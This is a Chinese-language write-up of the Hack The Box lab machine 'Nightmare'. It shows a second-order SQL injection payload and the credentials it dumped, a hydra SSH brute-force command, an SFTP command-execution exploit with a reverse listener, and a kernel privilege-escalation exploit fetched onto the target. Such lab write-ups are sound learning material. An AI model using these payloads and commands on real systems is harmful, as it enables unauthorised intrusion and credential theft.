HTB-靶机-Nightmare

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.66

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.66 -o ./Nightmare-autorecon

HTB-靶机-Nightmare

开放了两个端口,先访问80端口

HTB-靶机-Nightmare

就一登录界面经过测试发现存在二次注入,大概注入方式是先注册个带注入语句的用户名,密码随便输入,但是要记住,之后不断的尝试字段有多少个,有哪些字段,然后爆出字段的用户名和密码

下面是最终注入出来的用户名和密码的SQL注入语句
bmfx') union select 1,group_concat(username,0x7c,password,0x0a) from sysadmin.users#

admin|nimda
cisco|cisco123
adminstrator|Pyuhs738?183*hjO!
josh|tontochilegge
system|manager
root|HasdruBal78
decoder|HackerNumberOne!
ftpuser|@whereyougo?
sys|change_on_install
superuser|passw0rd
user|odiolafeta

HTB-靶机-Nightmare

具体手工注入过程参考:https://www.hackingarticles.in/hack-the-box-nightmare-walkthrough/

将上面获得的账户和密码单独放到两个文件user.txt 和pass.txt 使用hydra进行爆破

hydra -L user.txt -P pass.txt -t 64 10.10.10.66 ssh -s 2222

HTB-靶机-Nightmare

得到了账户和密码ftpuser/@whereyougo?

HTB-靶机-Nightmare

连接ssh发现登录不上,尝试连接下sftp确认可以登录看了下里面的文件,只能下载不能上传,搜索下sftp的exploit

searchsploit sftp command execution

HTB-靶机-Nightmare

修改exploit的代码

HTB-靶机-Nightmare

本地监听443端口执行exploit

HTB-靶机-Nightmare

HTB-靶机-Nightmare

翻看下目标家目录的文件夹有个文件不能进去,但是用户decoder能进去,找下属于该用户的文件

find / -group decoder 2>/dev/null

HTB-靶机-Nightmare

发现了二进制文件sls ,具体分析看这个:https://ironhackers.es/writeups/writeup-nightmare-hackthebox/ 下面是直接利用其缺陷跳转至shell读取了user.txt

HTB-靶机-Nightmare

查看权限

HTB-靶机-Nightmare

发现test目录针对用户decoder是存在写和执行的权限,但是没有读的权限,所以这里就是上面为啥目录能进去,但是执行ls查看不了东西的原因,查看内核版本和操作系统版本确认目标靶机存在本地提权漏洞,对应exploit链接:

https://www.exploit-db.com/exploits/43418
https://github.com/manulqwerty/CTF-Scripts-Writeups/blob/master/43418forNightmare.c

本地编译好:

gcc 43418forNightmare.c -o pwn

本地搭建简易web应用下载到目标靶机执行提权操作,注意:这里下载的提权文件放在test目录下刚好可以,而且含有执行权限

HTB-靶机-Nightmare

成功提权root权限

HTB-靶机-Nightmare

上一篇:HTB-靶机-Kotarak


下一篇:Metasploit之漏洞利用( Metasploitable2)